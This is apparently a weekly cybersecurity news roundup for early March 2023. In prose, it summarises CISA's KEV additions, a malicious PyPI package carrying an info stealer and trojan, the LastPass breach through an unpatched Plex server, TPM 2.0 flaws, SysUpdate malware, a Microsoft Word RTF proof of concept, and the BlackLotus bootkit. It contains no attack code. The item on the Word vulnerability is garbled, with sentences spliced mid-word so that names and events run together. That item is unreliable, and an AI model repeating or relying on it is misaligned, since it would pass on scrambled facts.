03/02/2023-03/08/2023. 3 New Flaws Threatening IT Management Systems, Info Stealer and Trojan in Python Package, LastPass Hack, New Flaws in TPM 2.0 Library And More

1. CISA’s KEV Catalog Updated with 3 New Flaws Threatening IT Management Systems

CISA has added three security flaws to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation.
The list of vulnerabilities is below:

• CVE-2022-35914 (CVSS score: 9.8) – Teclib GLPI Remote Code Execution Vulnerability
• CVE-2022-33891 (CVSS score: 8.8) – Apache Spark Command Injection Vulnerability
• CVE-2022-28810 (CVSS score: 6.8) – Zoho ManageEngine ADSelfService Plus Remote Code Execution Vulnerability

The most critical of the three is CVE-2022-35914, which concerns a remote code execution vulnerability in the third-party library htmlawed present in Teclib GLPI, an open source asset and IT management software package. In October 2022, Shadowserver Foundation noted exploitation attempts against its honeypots. VulnCheck researcher Jacob Baines said a cURL-based PoC and a “mass” scanner were available on GitHub. GreyNoise found 40 malicious IP addresses abusing the shortcoming. The Zerobot botnet exploited an unauthenticated command injection vulnerability in Apache Spark for DDoS attacks. KEV catalog listed a remote code execution flaw in Zoho ManageEngine ADSelfService Plus that was patched in April 2022. Rapid7 detected active exploitation attempts by threat actors. Wallarm found ongoing exploit attempts of two VMware NSX Manager flaws. 

2. Experts Identify Fully-Featured Info Stealer and Trojan in Python Package on PyPI

A malicious Python package uploaded to the Python Package Index (PyPI) has been found to contain a fully-featured information stealer and remote access trojan. The package, named colourfool, was identified by Kroll’s Cyber Threat Intelligence team, with the company calling the malware Colour-Blind. The ‘Colour-Blind’ malware points to the democratization of cybercrime that could lead to an intensified threat landscape, as multiple variants can be spawned from code sourced from others. colourfool, like other rogue Python modules discovered in recent months, conceals its malicious code in the setup script, which points to a ZIP archive payload hosted on Discord. The file contains a Python script (code.py) that comes with different modules designed to log keystrokes, steal cookies, and even disable security software. The ‘Colour-Blind’ trojan uses a Flask web application to establish remote control via Cloudflare, according to researchers. It is written almost entirely in Python, unlike the PowerShell-dependent poweRAT. The malware steals passwords, takes screenshots and logs keystrokes. Attackers are now publishing malware on Python packages, while others have deployed Rust executables to drop additional malware. “The risk/reward proposition for attackers is well worth the relatively minuscule time and effort,” the researchers said. 

3. LastPass Hack: Engineer’s Failure to Update Plex Software Led to Massive Data Breach

LastPass’s recent data breach occurred due to an engineer failing to update the Plex media software package on their home computer, highlighting the dangers of not keeping software up-to-date. The password management service revealed that an unidentified party used information stolen in an earlier incident and data from a third-party breach to launch a coordinated attack on the cloud storage environment, stealing encrypted password vault data and customer information. The attackers targeted one of four DevOps engineers, exploiting a now-patched flaw in Plex Media Server, CVE-2020-5741, to execute arbitrary Python code on the engineer’s computer and install a keylogger malware. Unfortunately, the engineer had not updated their software, preventing the patch from being activated. Plex released version 1.19.3.2764, which addressed the exploit, in May 2020.

4. New Flaws in TPM 2.0 Library Pose Threat to Billions of IoT and Enterprise Devices

Serious security flaws have been identified in the Trusted Platform Module (TPM) 2.0 reference library specification, which could potentially result in information disclosure or privilege escalation. Cybersecurity company Quarkslab discovered the vulnerabilities in November 2022. One vulnerability involves an out-of-bounds write, while the other concerns an out-of-bounds read. Large tech vendors and organizations that use enterprise computers, servers, IoT devices, and embedded systems that include a TPM can be impacted by the flaws, potentially affecting billions of devices. TPM is a hardware-based solution designed to provide secure cryptographic functions and physical security mechanisms to resist tampering. The flaws result from a lack of necessary length checks, leading to buffer overflows that could enable local information disclosure or privilege escalation. Users are urged to apply the updates released by TCG and other vendors to address the flaws and mitigate supply chain risks.

5. SysUpdate Malware Strikes Again with Linux Version and New Evasion Tactics

The Lucky Mouse threat actor has created a Linux version of its malware toolkit SysUpdate, enabling the group to target devices running on the operating system. The updated version dates back to July 2022 and includes new features to evade security software and resist reverse engineering. Lucky Mouse, also known as APT27, Bronze Union, Emissary Panda, and Iron Tiger, uses a variety of malware, including HyperBro, PlugX, and a Linux backdoor called rshell. The group’s campaigns have involved supply chain compromises of legitimate apps to gain remote access to compromised systems. The recent campaign targeted a gambling company in the Philippines using installers masquerading as messaging apps to activate the attack sequence. The Windows version of SysUpdate features process management, screenshots, file operations, and DNS Tunneling to communicate with C2 servers.

6. Proof-of-Concept Released For Critical Microsoft Word RCE bug

A proof-of-concept for CVE-2023-21716, a critical vulnerability in Microsoft Word that allows remote code execution, has been published over the weekene last year discovered the vulnerability in Microsoft Office’sd. The vulnerability was assigned a 9.8 out of 10 severity score. Security researcher Joshua Drak “wwlib.dll” and sent Microsoft a technical advisory containing proof-of-concept (PoC) code showing the issue is exploitable.
A remote attacker could potentially take advantage of the issue to execute code with the same privileges as the victim that opens a malicious .RTF document. Delivering the malicious file to a victim can be as easy as an attachment to an email, although plenty of other methods exist. Microsoft warns that users don’t have to open a malicious RTF document and simply loading the file in the Preview Pane is enough for the compromise to start. At the moment there is no indication that the vulnerability is being exploited in the wild and Microsoft’s current assessment is that taking advantage of the issue is “less likely.”

7. BlackLotus Bootkit Bypasses UEFI Secure Boot on Patched Windows 11

The BlackLotus UEFI bootkit has been improved with Secure Boot bypass capabilities that enable it to infect fully patched Windows 11 systems. This malware is the first known public example of UEFI malware that can bypass the Secure Boot mechanism, allowing it to disable security protections in the operating system. The malware could impair the BitLocker data protection feature, Microsoft Defender Antivirus, and the Hypervisor-protected Code Integrity. UEFI is low-level code that executes when a computer powers up and controls the booting sequence before the operating system starts. The malware emerged last year, promoted on hacking forums as virtually invisible to antivirus agents, and has a feature set that allows it to bypass security measures. Security researchers at ESET have confirmed the malware can bypass the Secure Boot mechanism by leveraging a vulnerability tracked as CVE-2022-21894.